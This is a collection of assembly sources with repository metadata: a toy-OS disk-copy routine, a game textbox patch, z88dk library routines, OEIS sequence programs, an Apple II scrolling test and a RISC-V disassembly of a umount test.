stack OS_SYSCALL OSUTIL_PUSHREGSANDCOPY ; Negate $a3 ASET 3 NOT ADD 1 CBFD_COPYLP: ; Check validity of the track number by masking out valid range bits ASET 2 SPUSH ; Push twice as we need the original value after this operation SPUSH LARl 0xE0 ; 0xE0 masks out valid track bits SPOP AND BRnp TRACKNUM_ERROR SPOP ; Restore the track number PORTOUT_DISK_TRACKSEL CBFD_COPYLP_NOSETTRACK: ; Jump to this if we don't need to set the track ASET 3 BRz CBFD_COPYLP_END ADD 1 ; Set up $a8 and $a9 ASET 0 SPUSH ASET 8 SPOP ASET 1 SPUSH ASET 9 SPOP ASET 10 ; Select temporary register for call OS_LOCALSYSCALL COPYFROMDSK ; Increment the source and destination segment ASET 1 ADD 1 ; TODO: System error if $a1 overflows ASET 0 ADD 1 ; Check that the disk segment number is valid by masking out valid range bits SPUSH ; Push the segment number twice so we can restore it afterwards SPUSH ASET 10 ; Use $a10 as a temp register for this operation LARl 0x70 ; 0x70 masks away all but the invalid segment number bits. Valid values will mask to 0. SPOP AND ASET 0 SPOP ; Restore the segment number ASET 10 ; Continue without setting a new track if the segment number is in range BRz CBFD_COPYLP_NOSETTRACK ; ...otherwise, set the segment number to zero, and increment the track number ASET 0 AND 0 ASET 2 ADD 1 JMP CBFD_COPYLP CBFD_COPYLP_END: ; Restore the old values of $a0, $a1, $a2, and $a3 OS_SYSCALL OSUTIL_POPREGS OS_SYSCALL_RET ; ; Copies a series of segments from memory to disk. ; $a8 - The source memory segment number ; $a9 - The destination disk segment number ; $a10 - The destination disk track number ; $a11 - The number of segments to copy ; ; Volatile registers: ; $a8 ; $a9 ; $a10 ; $a11 ; COPYBULKTODSK: ; Use $a0, $a1, $a2, $a3 in place of $a8, $a9, $a10, and $a11 ; Store the current values onto the stack OS_SYSCALL OSUTIL_PUSHREGSANDCOPY ; Negate $a3 ASET 3 NOT ADD 1 CBTD_COPYLP: ; Check validity of the track number by masking out valid range bits ASET 2 SPUSH ; Push twice as we need the original value after this operation SPUSH LARl 0xE0 ; 0xE0 masks out valid track bits SPOP AND BRnp TRACKNUM_ERROR SPOP ; Restore the track number PORTOUT_DISK_TRACKSEL CBTD_COPYLP_NOSETTRACK: ; Jump to this if we don't need to set the track ASET 3 BRz CBTD_COPYLP_END ADD 1 ; Set up $a8 and $a9 ASET 0 SPUSH ASET 8 SPOP ASET 1 SPUSH ASET 9 SPOP ASET 10 ; Select temporary register for call OS_LOCALSYSCALL COPYTODSK ; Increment the source and destination segment ASET 1 ADD 1 ; TODO: System error if $a1 overflows ASET 0 ADD 1 ; Check that the disk segment number is valid by masking out valid range bits SPUSH ; Push the segment number twice so we can restore it afterwards SPUSH ASET 10 ; Use $a10 as a temp register for this operation LARl 0x70 ; 0x70 masks away all but the invalid segment number bits. Valid values will mask to 0. SPOP AND ASET 0 SPOP ; Restore the segment number ASET 10 ; Continue without setting a new track if the segment number is in range BRz CBTD_COPYLP_NOSETTRACK ; ...otherwise, set the segment number to zero, and increment the track number ASET 0 AND 0 ASET 2 ADD 1 JMP CBTD_COPYLP CBTD_COPYLP_END: ; Restore the old values of $a0, $a1, $a2, and $a3 OS_SYSCALL OSUTIL_POPREGS OS_SYSCALL_RET ; Handle track number errors TRACKNUM_ERROR: ASET 8 LARl 0x02 OS_SYSJUMP FAULTHANDLER_PRINTERR ; Handle segment number errors SEGNUM_ERROR: ASET 8 LARl 0x03 OS_SYSJUMP FAULTHANDLER_PRINTERR

24.915541

107

0.615322

2588967c836de85e422ac606233957861ab0d5c6

1,552

asm

Assembly

Assembly/textbox/script_top.asm

WildGenie/Ninokuni

019b4b7f069b311d0146d634f0af4c3096be7dd9

[ "Apache-2.0" ]

14

2015-01-15T19:08:06.000Z

2021-09-27T17:27:22.000Z

Assembly/textbox/script_top.asm

WildGenie/Ninokuni

019b4b7f069b311d0146d634f0af4c3096be7dd9

[ "Apache-2.0" ]

5

2015-01-13T21:19:45.000Z

2015-04-12T15:51:18.000Z

Assembly/textbox/script_top.asm

WildGenie/Ninokuni

019b4b7f069b311d0146d634f0af4c3096be7dd9

[ "Apache-2.0" ]

7

2015-02-02T20:14:00.000Z

2017-05-14T07:58:12.000Z

;;----------------------------------------------------------------------------;; ;; Align the position and increase size of the textbox in map name and scenario ;; Copyright 2014 Benito Palacios (aka pleonex) ;; ;; Licensed under the Apache License, Version 2.0 (the "License"); ;; you may not use this file except in compliance with the License. ;; You may obtain a copy of the License at ;; ;; http://www.apache.org/licenses/LICENSE-2.0 ;; ;; Unless required by applicable law or agreed to in writing, software ;; distributed under the License is distributed on an "AS IS" BASIS, ;; WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. ;; See the License for the specific language governing permissions and ;; limitations under the License. ;;----------------------------------------------------------------------------;; ;; # MAP NAME # .arm .org 020C3174h MOV R0, #0x10 ; Width: Value * 8 [original #0xC] STR R0, [SP] MOV R0, #0x2 ; Height: Value * 8 [original #0x2] STR R0, [SP,#4] .org 020C31A8h MOV R0, #0x89000 ; X position: Value >> 12 [original #0x98000] STR R0, [R1,#0x14] MOV R0, #0x4000 ; Y position: Value >> 12 [original #0x4000] STR R0, [R1,#0x18] .org 020C4238h RSB R1, R1, #0x38 ; Textbox width / 2 [original #0x30] ;; # SCENARIO # .org 020C3104h MOV R0, #0x4000 ; X position: Value >> 12 [original #0x4000] STR R0, [R1,#0x14] MOV R0, #0xAB000 ; Y position: Value >> 12 [original #0xAA000] STR R0, [R1,#0x18]

37.853659

80

0.584407

65f708c9b3d2aa80936d8f6bd2c80dcb73fd7880

491

asm

Assembly

libsrc/enterprise/exos_create_channel.asm

meesokim/z88dk

5763c7778f19a71d936b3200374059d267066bb2

[ "ClArtistic" ]

null

libsrc/enterprise/exos_create_channel.asm

meesokim/z88dk

5763c7778f19a71d936b3200374059d267066bb2

[ "ClArtistic" ]

null

libsrc/enterprise/exos_create_channel.asm

meesokim/z88dk

5763c7778f19a71d936b3200374059d267066bb2

[ "ClArtistic" ]

null

; ; Enterprise 64/128 specific routines ; by Stefano Bodrato, 2011 ; ; exos_create_channel(unsigned char ch_number, char *device); ; ; ; $Id: exos_create_channel.asm,v 1.3 2015/01/19 01:32:42 pauloscustodio Exp $ ; PUBLIC exos_create_channel EXTERN exos_create_channel_callee EXTERN ASMDISP_EXOS_CREATE_CHANNEL_CALLEE exos_create_channel: pop bc pop de pop hl push hl push de push bc jp exos_create_channel_callee + ASMDISP_EXOS_CREATE_CHANNEL_CALLEE

17.535714

77

0.753564

8578bd5595fbc5466ab3763e8f7e65236290e4ea

848

asm

Assembly

libsrc/_DEVELOPMENT/fcntl/z80/__fcntl_fd_from_fdstruct.asm

jpoikela/z88dk

7108b2d7e3a98a77de99b30c9a7c9199da9c75cb

[ "ClArtistic" ]

640

2017-01-14T23:33:45.000Z

2022-03-30T11:28:42.000Z

libsrc/_DEVELOPMENT/fcntl/z80/__fcntl_fd_from_fdstruct.asm

jpoikela/z88dk

7108b2d7e3a98a77de99b30c9a7c9199da9c75cb

[ "ClArtistic" ]

1,600

2017-01-15T16:12:02.000Z

2022-03-31T12:11:12.000Z

libsrc/_DEVELOPMENT/fcntl/z80/__fcntl_fd_from_fdstruct.asm

jpoikela/z88dk

7108b2d7e3a98a77de99b30c9a7c9199da9c75cb

[ "ClArtistic" ]

215

2017-01-17T10:43:03.000Z

2022-03-23T17:25:02.000Z

SECTION code_clib SECTION code_fcntl PUBLIC __fcntl_fd_from_fdstruct EXTERN error_ebdfd_mc EXTERN __fcntl_fdtbl, __fcntl_fdtbl_size __fcntl_fd_from_fdstruct: ; search for fdstruct in fdtbl and return corresponding fd ; ; enter : de = FDSTRUCT * ; ; exit : success ; ; b = fdtbl_size - fd ; hl = & fdtbl[fd] + 1b ; carry reset ; ; fail if not found ; ; hl = -1 ; carry set, errno = EBDFD ; ; uses : af, b, hl ld b,__fcntl_fdtbl_size ld hl,__fcntl_fdtbl loop_0: ld a,e loop_1: cp (hl) inc hl jr z, possible_match inc hl djnz loop_1 jp error_ebdfd_mc possible_match: ld a,d cp (hl) ret z ; if match inc hl djnz loop_0 jp error_ebdfd_mc

14.372881

61

0.555425

c8021150ccd81fd7a3dc7dae1a92aa1ef55b158d

958

asm

Assembly

programs/oeis/213/A213046.asm

karttu/loda

9c3b0fc57b810302220c044a9d17db733c76a598

[ "Apache-2.0" ]

1

2021-03-15T11:38:20.000Z

programs/oeis/213/A213046.asm

karttu/loda

9c3b0fc57b810302220c044a9d17db733c76a598

[ "Apache-2.0" ]

null

programs/oeis/213/A213046.asm

karttu/loda

9c3b0fc57b810302220c044a9d17db733c76a598

[ "Apache-2.0" ]

null

; A213046: Convolution of Lucas numbers and positive integers repeated (A000032 and A008619). ; 2,3,8,13,25,41,71,116,193,314,514,834,1356,2197,3562,5767,9339,15115,24465,39590,64067,103668,167748,271428,439190,710631,1149836,1860481,3010333,4870829,7881179,12752024,20633221,33385262,54018502,87403782,141422304,228826105,370248430,599074555,969323007,1568397583,2537720613,4106118218,6643838855,10749957096,17393795976,28143753096,45537549098,73681302219,119218851344,192900153589,312119004961,505019158577,817138163567,1322157322172,2139295485769,3461452807970,5600748293770,9062201101770,14662949395572,23725150497373,38388099892978,62113250390383,100501350283395,162614600673811,263115950957241,425730551631086,688846502588363,1114577054219484,1803423556807884,2918000611027404,4721424167835326,7639424778862767 add $0,3 mov $2,$0 div $2,2 cal $0,14217 ; a(n) = floor(phi^n), where phi = (1+sqrt(5))/2 is the golden ratio. mov $1,$0 sub $1,$2 sub $1,1

87.090909

722

0.839248

087deaee2fe74867edd35da6615e11bac6e99366

1,857

asm

Assembly

programs/oeis/239/A239745.asm

neoneye/loda

afe9559fb53ee12e3040da54bd6aa47283e0d9ec

[ "Apache-2.0" ]

22

2018-02-06T19:19:31.000Z

2022-01-17T21:53:31.000Z

programs/oeis/239/A239745.asm

neoneye/loda

afe9559fb53ee12e3040da54bd6aa47283e0d9ec

[ "Apache-2.0" ]

41

2021-02-22T19:00:34.000Z

2021-08-28T10:47:47.000Z

programs/oeis/239/A239745.asm

neoneye/loda

afe9559fb53ee12e3040da54bd6aa47283e0d9ec

[ "Apache-2.0" ]

5

2021-02-24T21:14:16.000Z

2021-08-09T19:48:05.000Z

; A239745: a(n) = (3*2^(n+2) + n*(n+5))/2 - 6. ; 0,9,25,54,108,211,411,804,1582,3129,6213,12370,24672,49263,98431,196752,393378,786613,1573065,3145950,6291700,12583179,25166115,50331964,100663638,201326961,402653581,805306794,1610613192,3221225959,6442451463,12884902440,25769804362,51539608173,103079215761,206158430902,412316861148,824633721603,1649267442475,3298534884180,6597069767550,13194139534249,26388279067605,52776558134274,105553116267568,211106232534111,422212465067151,844424930133184,1688849860265202,3377699720529189,6755399441057113,13510798882112910,27021597764224452,54043195528447483,108086391056893491,216172782113785452,432345564227569318,864691128455136993,1729382256910272285,3458764513820542810,6917529027641083800,13835058055282165719,27670116110564329495,55340232221128656984,110680464442257311898,221360928884514621661,442721857769029241121,885443715538058479974,1770887431076116957612,3541774862152233912819,7083549724304467823163,14167099448608935643780,28334198897217871284942,56668397794435742567193,113336795588871485131621,226673591177742970260402,453347182355485940517888,906694364710971881032783,1813388729421943762062495,3626777458843887524121840,7253554917687775048240450,14507109835375550096477589,29014219670751100192951785,58028439341502200385900094,116056878683004400771796628,232113757366008801543589611,464227514732017603087175491,928455029464035206174347164,1856910058928070412348690422,3713820117856140824697376849,7427640235712281649394749613,14855280471424563298789495050,29710560942849126597578985832,59421121885698253195157967303,118842243771396506390315930151,237684487542793012780631855752,475368975085586025561263706858,950737950171172051122527408973,1901475900342344102245054813105,3802951800684688204490109621270 lpb $0 add $1,$2 add $1,$0 sub $0,1 add $1,8 add $2,3 mul $2,2 lpe mov $0,$1

142.846154

1,719

0.903608

f4f59cc2c3a949a5b22d6d959a8d57e0432ae85c

6,661

asm

Assembly

Tests/T.SCROLL.asm

clandrew/demoII

78cca3ebc5ca244e5dc9d5e3d729e2f5a1cf2471

[ "MIT" ]

1

2020-07-31T22:36:48.000Z

Tests/T.SCROLL.asm

clandrew/demoII

78cca3ebc5ca244e5dc9d5e3d729e2f5a1cf2471

[ "MIT" ]

null

Tests/T.SCROLL.asm

clandrew/demoII

78cca3ebc5ca244e5dc9d5e3d729e2f5a1cf2471

[ "MIT" ]

null

******************************** ORG $6000 * TXTCLR EQU $C050 TXTSET EQU $C051 MIXCLR EQU $C052 LORES EQU $C056 CLRGR EQU $F832 KYBD EQU $C000 TBUFCLR EQU $FC58 CHIRP EQU $C030 WAIT EQU $FCA8 * VSCROLL EQU $D7 IMGBASE0 EQU $EB IMGBASE1 EQU $EC * LDA #$00 STA TXTCLR STA MIXCLR STA LORES * JSR CLRGR ******************************** * LDA #$00 STA VSCROLL * LDA #<TUNNEL STA IMGBASE0 LDA #>TUNNEL STA IMGBASE1 JSR FILLIMG ******************************** * LOOP NOP LDA KYBD PHA AND #$7F STA $C010 PLA CMP #$8A BNE SCRLDNCHK JSR SCROLLDOWN JMP LOOP SCRLDNCHK NOP CMP #$8B BNE SCRLUPCHK JSR SCROLLUP JMP LOOP SCRLUPCHK CMP #$80 BCC LOOP LDA #$00 STA TXTSET JSR TBUFCLR RTS ; END MAINLINE * ******************************** * SCROLLDOWN NOP LDA #<TUNNEL STA IMGBASE0 LDA #>TUNNEL STA IMGBASE1 INC VSCROLL JSR FILLIMG ; REPAINT RTS * ******************************** * SCROLLUP NOP LDA #<TUNNEL STA IMGBASE0 LDA #>TUNNEL STA IMGBASE1 DEC VSCROLL JSR FILLIMG ; REPAINT RTS * ******************************** * INCIMGBASE * INCREMENTS IMGBASE BY #$28. INCIMGBASE LDA IMGBASE0 CLC ADC #$28 STA IMGBASE0 BCC NOCARRY INC IMGBASE1 NOCARRY RTS ******************************** * FILLIMG * REQUIRES ADDRESS OF IMAGE IN EB-EC. * CLOBBERS EB-EC. * FILLIMG LDY #$00 * * APPLY SCROLLING AMOUNT. LDX VSCROLL APPLYSCROLL CPX #$00 BEQ DONESCROLL JSR INCIMGBASE DEX JMP APPLYSCROLL DONESCROLL * ROWPAIR NOP LDA LORESR0,Y STA $E9 LDA LORESR0+1,Y STA $E8 * LDX #$0 * IMGBYTE TYA PHA TXA TAY LDA ($EB),Y STA ($E8),Y PLA TAY INX CPX #$28 BNE IMGBYTE * JSR INCIMGBASE INY INY CPY #$30 BNE ROWPAIR RTS * TUNNEL HEX 22222222222222222222222222222222 HEX 22222222222222222222222222222222 HEX 22222222222222222222222222222222 HEX 22222222222222222222222222222222 HEX 22222222222222222222222222222222 HEX 222222222222D2222222222222222222 HEX 2222D222222222222222222222222222 HEX 22222222222222222222222222222222 HEX 22222222222222222222222222222222 HEX 22222222222222222222222D22222222 HEX 22222222222222222222222222222222 HEX 22222222222222222222222222222222 HEX 22222222222222222222222222222222 HEX 22D22222222222222222222222222222 HEX 22222222222222222222222222222222 HEX 22222222222222222222222222222222 HEX 2D22222222222222222222222D222222 HEX 22222222222222222222222222222222 HEX 22222222222222222222222222222222 HEX 22222222222222222222222222222222 HEX 2222D222222222222222222222222222 HEX 22222222222222222222222222222222 HEX 22222222222D22222222222222222222 HEX 22222222222222222222222222222222 HEX 22222222222222222222222222222222 HEX 22222222222222222222222222222222 HEX 22222222222202020202020222222222 HEX 22222222222222222222222222222222 HEX 22222222222222222222222222220000 HEX 00000000222222222222222222222222 HEX 00000000222222222222222222222222 HEX 22222222222200000000000022222222 HEX 22222222222222220000000022222222 HEX 22222222222222222222222222220000 HEX 00000000220202020222222200000000 HEX 00000000222222222222222222222222 HEX 22222222222200000000000022000000 HEX 00222222000000000000000022000000 HEX 22222222220202020202022222220000 HEX 00000000000000000022222200000000 HEX 00000000020000002200000000000000 HEX 00000000000000000000000000000000 HEX 00222222000000000000000000000000 HEX 00000000000000000000000000000000 HEX 00000000000000000000000000000000 HEX 00000000000000000000000000000000 HEX 00000000000000000000000000000000 HEX 00000000000000008000800080008000 HEX 80008000800080008000800080008000 HEX 80008000800080008000800080008000 HEX 08000800080008000800080008000800 HEX 08000800080008000800080008000800 HEX 08000800080008008888888888880088 HEX 88888888888800888888888888880088 HEX 88888888888800888888888888880088 HEX 08080808080800080808080808080008 HEX 08080808080800080808080808080008 HEX 08080808080800088800888888888888 HEX 88008888888888888800888888888888 HEX 88008888888888888800888888888888 HEX 88008888888888888800888888888888 HEX 88008888888888888800888888888888 HEX 88008888888888888080808000808080 HEX 80808080008080808080808000808080 HEX 80808080008080808080808000808080 HEX 88888888008888888888888800888888 HEX 88888888008888888888888800888888 HEX 88888888008888880909090800090909 HEX 09090908000909090909090800090909 HEX 09090908000808080808080800080808 HEX 80808080808080808080808080808080 HEX 80808080808080808080808080808080 HEX 80000000000000000000202020202020 HEX 20202020202020202020202020202020 HEX 20202020202020200888888080808080 HEX 02020000000000000000000000000000 HEX 00000000000000000000000000000000 HEX 00080808080808080000000000000000 HEX 00000000000000000000000000000000 HEX 00000000000000000000999998880088 HEX 00000000000000000000000000000000 HEX 00000000000000000000000000000000 HEX 00009000808080800000000000000000 HEX 00000000000000000000000000000000 HEX 00000000000000000000090008080808 HEX 20202020202020202060606020202020 HEX 20202020000202020222222222222020 HEX 20000099888888882222222262622626 HEX 26222222222222222222222222222222 HEX 22202020020202022222200808000808 HEX 22226226222222222222222222222222 HEX 22222222222222222222222222222222 HEX 20606262620080806226222222222222 HEX 22222222222222222222222222222222 HEX 22222222226262060680202020200808 HEX 66222222222222222222222222626262 HEX 62626262626262626262626206808008 HEX 08882222222200086666666666666666 HEX 66666666666666868666666666666686 HEX 88866666008888808088222222220000 HEX 66666666868888888666666666868888 HEX 88888666666688888888886600880808 HEX 88882222220088086666668888888888 HEX 88886666668888988898886666668888 HEX 88888866008800008808020202008080 HEX 66666698989998989998666666999999 HEX 99999966666698989999980600000050 HEX 50555555550008086666669999999999 HEX 99996666669999D8D899996666669979 HEX 79797777555555555555555555008800 HEX 6666669999999999999966060609E90D HEX 0DE77777707057575757777777777775 HEX 75555555550000006606067979797977 HEX 7777777775DEEE0000EE5E7D77777775 HEX 75555555577777777777777575008888 HEX 5050575777777777777777777777EE00 HEX 7000EE55575757777777777775757555 HEX 57777777770080805555555555555555 HEX 57577777777700707700777775755555 HEX 57777777777777777777770700000808 HEX 55555555555555555555555757777077 HEX 77707077777777757555555757777777 HEX 77777700888800885555555555555555 HEX 55555555555555575777777777777777 HEX 77777775755555575777770000000000 * LORESR0 HEX 0400 HEX 0480 HEX 0500 HEX 0580 HEX 0600 HEX 0680 HEX 0700 HEX 0780 HEX 0428 HEX 04A8 HEX 0528 HEX 05A8 HEX 0628 HEX 06A8 HEX 0728 HEX 07A8 HEX 0450 HEX 04D0 HEX 0550 HEX 05D0 HEX 0650 HEX 06D0 HEX 0750 HEX 07D0

23.37193

43

0.833809

e49cf14ebf4c92bfb7ce09564d1c7112b4d4ff4f

82,214

asm

Assembly

oscomp/build/asm/umount.asm

wei-huan/MyOS

0592dd73fd9768a9a69975f7d18c758999195774

[ "MIT" ]

2

2022-02-21T08:37:46.000Z

2022-03-03T06:01:47.000Z

oscomp/build/asm/umount.asm

wei-huan/MyOS

0592dd73fd9768a9a69975f7d18c758999195774

[ "MIT" ]

null

oscomp/build/asm/umount.asm

wei-huan/MyOS

0592dd73fd9768a9a69975f7d18c758999195774

[ "MIT" ]

null

/home/weihuan/Documents/testsuits-for-oskernel-preliminary/riscv-syscalls-testing/user/build/riscv64/umount: file format elf64-littleriscv Disassembly of section .text: 0000000000001000 <_start>: .section .text.entry .globl _start _start: mv a0, sp 1000: 850a mv a0,sp tail __start_main 1002: aa21 j 111a <__start_main> 0000000000001004 <test_umount>: static char mntpoint[64] = "./mnt"; static char device[64] = "/dev/vda2"; static const char *fs_type = "vfat"; void test_umount() { 1004: 1101 addi sp,sp,-32 TEST_START(__func__); 1006: 00001517 auipc a0,0x1 100a: f5250513 addi a0,a0,-174 # 1f58 <__clone+0x2c> void test_umount() { 100e: ec06 sd ra,24(sp) 1010: e822 sd s0,16(sp) TEST_START(__func__); 1012: 37a000ef jal ra,138c <puts> 1016: 00001517 auipc a0,0x1 101a: 09250513 addi a0,a0,146 # 20a8 <__func__.0> 101e: 36e000ef jal ra,138c <puts> 1022: 00001517 auipc a0,0x1 1026: f4e50513 addi a0,a0,-178 # 1f70 <__clone+0x44> 102a: 362000ef jal ra,138c <puts> printf("Mounting dev:%s to %s\n", device, mntpoint); 102e: 00001617 auipc a2,0x1 1032: ffa60613 addi a2,a2,-6 # 2028 <mntpoint> 1036: 00001597 auipc a1,0x1 103a: 03258593 addi a1,a1,50 # 2068 <device> 103e: 00001517 auipc a0,0x1 1042: f4250513 addi a0,a0,-190 # 1f80 <__clone+0x54> 1046: 368000ef jal ra,13ae <printf> int ret = mount(device, mntpoint, fs_type, 0, NULL); 104a: 00001597 auipc a1,0x1 104e: fde58593 addi a1,a1,-34 # 2028 <mntpoint> 1052: 4701 li a4,0 1054: 4681 li a3,0 1056: 00001617 auipc a2,0x1 105a: f4260613 addi a2,a2,-190 # 1f98 <__clone+0x6c> 105e: 00001517 auipc a0,0x1 1062: 00a50513 addi a0,a0,10 # 2068 <device> 1066: 6ad000ef jal ra,1f12 <mount> 106a: 842a mv s0,a0 printf("mount return: %d\n", ret); 106c: 85aa mv a1,a0 106e: 00001517 auipc a0,0x1 1072: f3250513 addi a0,a0,-206 # 1fa0 <__clone+0x74> 1076: 338000ef jal ra,13ae <printf> if (ret == 0) { 107a: c40d beqz s0,10a4 <test_umount+0xa0> ret = umount(mntpoint); assert(ret == 0); printf("umount success.\nreturn: %d\n", ret); } TEST_END(__func__); 107c: 00001517 auipc a0,0x1 1080: f7c50513 addi a0,a0,-132 # 1ff8 <__clone+0xcc> 1084: 308000ef jal ra,138c <puts> 1088: 00001517 auipc a0,0x1 108c: 02050513 addi a0,a0,32 # 20a8 <__func__.0> 1090: 2fc000ef jal ra,138c <puts> } 1094: 6442 ld s0,16(sp) 1096: 60e2 ld ra,24(sp) TEST_END(__func__); 1098: 00001517 auipc a0,0x1 109c: ed850513 addi a0,a0,-296 # 1f70 <__clone+0x44> } 10a0: 6105 addi sp,sp,32 TEST_END(__func__); 10a2: a4ed j 138c <puts> ret = umount(mntpoint); 10a4: 00001517 auipc a0,0x1 10a8: f8450513 addi a0,a0,-124 # 2028 <mntpoint> 10ac: 673000ef jal ra,1f1e <umount> 10b0: 85aa mv a1,a0 assert(ret == 0); 10b2: e901 bnez a0,10c2 <test_umount+0xbe> printf("umount success.\nreturn: %d\n", ret); 10b4: 00001517 auipc a0,0x1 10b8: f2450513 addi a0,a0,-220 # 1fd8 <__clone+0xac> 10bc: 2f2000ef jal ra,13ae <printf> 10c0: bf75 j 107c <test_umount+0x78> 10c2: e42a sd a0,8(sp) assert(ret == 0); 10c4: 00001517 auipc a0,0x1 10c8: ef450513 addi a0,a0,-268 # 1fb8 <__clone+0x8c> 10cc: 566000ef jal ra,1632 <panic> 10d0: 65a2 ld a1,8(sp) 10d2: b7cd j 10b4 <test_umount+0xb0> 00000000000010d4 <main>: int main(int argc,char *argv[]) { 10d4: 1101 addi sp,sp,-32 10d6: ec06 sd ra,24(sp) 10d8: e822 sd s0,16(sp) 10da: e426 sd s1,8(sp) if(argc >= 2){ 10dc: 4785 li a5,1 10de: 00a7ca63 blt a5,a0,10f2 <main+0x1e> if(argc >= 3){ strcpy(mntpoint, argv[2]); } test_umount(); 10e2: f23ff0ef jal ra,1004 <test_umount> return 0; } 10e6: 60e2 ld ra,24(sp) 10e8: 6442 ld s0,16(sp) 10ea: 64a2 ld s1,8(sp) 10ec: 4501 li a0,0 10ee: 6105 addi sp,sp,32 10f0: 8082 ret strcpy(device, argv[1]); 10f2: 84ae mv s1,a1 10f4: 658c ld a1,8(a1) 10f6: 842a mv s0,a0 10f8: 00001517 auipc a0,0x1 10fc: f7050513 addi a0,a0,-144 # 2068 <device> 1100: 12b000ef jal ra,1a2a <strcpy> if(argc >= 3){ 1104: 4789 li a5,2 1106: fcf40ee3 beq s0,a5,10e2 <main+0xe> strcpy(mntpoint, argv[2]); 110a: 688c ld a1,16(s1) 110c: 00001517 auipc a0,0x1 1110: f1c50513 addi a0,a0,-228 # 2028 <mntpoint> 1114: 117000ef jal ra,1a2a <strcpy> 1118: b7e9 j 10e2 <main+0xe> 000000000000111a <__start_main>: #include <unistd.h> extern int main(); int __start_main(long *p) { 111a: 85aa mv a1,a0 int argc = p[0]; char **argv = (void *)(p+1); exit(main(argc, argv)); 111c: 4108 lw a0,0(a0) { 111e: 1141 addi sp,sp,-16 exit(main(argc, argv)); 1120: 05a1 addi a1,a1,8 { 1122: e406 sd ra,8(sp) exit(main(argc, argv)); 1124: fb1ff0ef jal ra,10d4 <main> 1128: 41d000ef jal ra,1d44 <exit> return 0; } 112c: 60a2 ld ra,8(sp) 112e: 4501 li a0,0 1130: 0141 addi sp,sp,16 1132: 8082 ret 0000000000001134 <printint.constprop.0>: write(f, s, l); } static char digits[] = "0123456789abcdef"; static void printint(int xx, int base, int sign) 1134: 7179 addi sp,sp,-48 1136: f406 sd ra,40(sp) { char buf[16 + 1]; int i; uint x; if (sign && (sign = xx < 0)) 1138: 12054b63 bltz a0,126e <printint.constprop.0+0x13a> buf[16] = 0; i = 15; do { buf[i--] = digits[x % base]; 113c: 02b577bb remuw a5,a0,a1 1140: 00001617 auipc a2,0x1 1144: f7860613 addi a2,a2,-136 # 20b8 <digits> buf[16] = 0; 1148: 00010c23 sb zero,24(sp) buf[i--] = digits[x % base]; 114c: 0005871b sext.w a4,a1 1150: 1782 slli a5,a5,0x20 1152: 9381 srli a5,a5,0x20 1154: 97b2 add a5,a5,a2 1156: 0007c783 lbu a5,0(a5) } while ((x /= base) != 0); 115a: 02b5583b divuw a6,a0,a1 buf[i--] = digits[x % base]; 115e: 00f10ba3 sb a5,23(sp) } while ((x /= base) != 0); 1162: 1cb56363 bltu a0,a1,1328 <printint.constprop.0+0x1f4> buf[i--] = digits[x % base]; 1166: 45b9 li a1,14 1168: 02e877bb remuw a5,a6,a4 116c: 1782 slli a5,a5,0x20 116e: 9381 srli a5,a5,0x20 1170: 97b2 add a5,a5,a2 1172: 0007c783 lbu a5,0(a5) } while ((x /= base) != 0); 1176: 02e856bb divuw a3,a6,a4 buf[i--] = digits[x % base]; 117a: 00f10b23 sb a5,22(sp) } while ((x /= base) != 0); 117e: 0ce86e63 bltu a6,a4,125a <printint.constprop.0+0x126> buf[i--] = digits[x % base]; 1182: 02e6f5bb remuw a1,a3,a4 } while ((x /= base) != 0); 1186: 02e6d7bb divuw a5,a3,a4 buf[i--] = digits[x % base]; 118a: 1582 slli a1,a1,0x20 118c: 9181 srli a1,a1,0x20 118e: 95b2 add a1,a1,a2 1190: 0005c583 lbu a1,0(a1) 1194: 00b10aa3 sb a1,21(sp) } while ((x /= base) != 0); 1198: 0007859b sext.w a1,a5 119c: 12e6ec63 bltu a3,a4,12d4 <printint.constprop.0+0x1a0> buf[i--] = digits[x % base]; 11a0: 02e7f6bb remuw a3,a5,a4 11a4: 1682 slli a3,a3,0x20 11a6: 9281 srli a3,a3,0x20 11a8: 96b2 add a3,a3,a2 11aa: 0006c683 lbu a3,0(a3) } while ((x /= base) != 0); 11ae: 02e7d83b divuw a6,a5,a4 buf[i--] = digits[x % base]; 11b2: 00d10a23 sb a3,20(sp) } while ((x /= base) != 0); 11b6: 12e5e863 bltu a1,a4,12e6 <printint.constprop.0+0x1b2> buf[i--] = digits[x % base]; 11ba: 02e876bb remuw a3,a6,a4 11be: 1682 slli a3,a3,0x20 11c0: 9281 srli a3,a3,0x20 11c2: 96b2 add a3,a3,a2 11c4: 0006c683 lbu a3,0(a3) } while ((x /= base) != 0); 11c8: 02e855bb divuw a1,a6,a4 buf[i--] = digits[x % base]; 11cc: 00d109a3 sb a3,19(sp) } while ((x /= base) != 0); 11d0: 12e86463 bltu a6,a4,12f8 <printint.constprop.0+0x1c4> buf[i--] = digits[x % base]; 11d4: 02e5f6bb remuw a3,a1,a4 11d8: 1682 slli a3,a3,0x20 11da: 9281 srli a3,a3,0x20 11dc: 96b2 add a3,a3,a2 11de: 0006c683 lbu a3,0(a3) } while ((x /= base) != 0); 11e2: 02e5d83b divuw a6,a1,a4 buf[i--] = digits[x % base]; 11e6: 00d10923 sb a3,18(sp) } while ((x /= base) != 0); 11ea: 0ce5ec63 bltu a1,a4,12c2 <printint.constprop.0+0x18e> buf[i--] = digits[x % base]; 11ee: 02e876bb remuw a3,a6,a4 11f2: 1682 slli a3,a3,0x20 11f4: 9281 srli a3,a3,0x20 11f6: 96b2 add a3,a3,a2 11f8: 0006c683 lbu a3,0(a3) } while ((x /= base) != 0); 11fc: 02e855bb divuw a1,a6,a4 buf[i--] = digits[x % base]; 1200: 00d108a3 sb a3,17(sp) } while ((x /= base) != 0); 1204: 10e86963 bltu a6,a4,1316 <printint.constprop.0+0x1e2> buf[i--] = digits[x % base]; 1208: 02e5f6bb remuw a3,a1,a4 120c: 1682 slli a3,a3,0x20 120e: 9281 srli a3,a3,0x20 1210: 96b2 add a3,a3,a2 1212: 0006c683 lbu a3,0(a3) } while ((x /= base) != 0); 1216: 02e5d83b divuw a6,a1,a4 buf[i--] = digits[x % base]; 121a: 00d10823 sb a3,16(sp) } while ((x /= base) != 0); 121e: 10e5e763 bltu a1,a4,132c <printint.constprop.0+0x1f8> buf[i--] = digits[x % base]; 1222: 02e876bb remuw a3,a6,a4 1226: 1682 slli a3,a3,0x20 1228: 9281 srli a3,a3,0x20 122a: 96b2 add a3,a3,a2 122c: 0006c683 lbu a3,0(a3) } while ((x /= base) != 0); 1230: 02e857bb divuw a5,a6,a4 buf[i--] = digits[x % base]; 1234: 00d107a3 sb a3,15(sp) 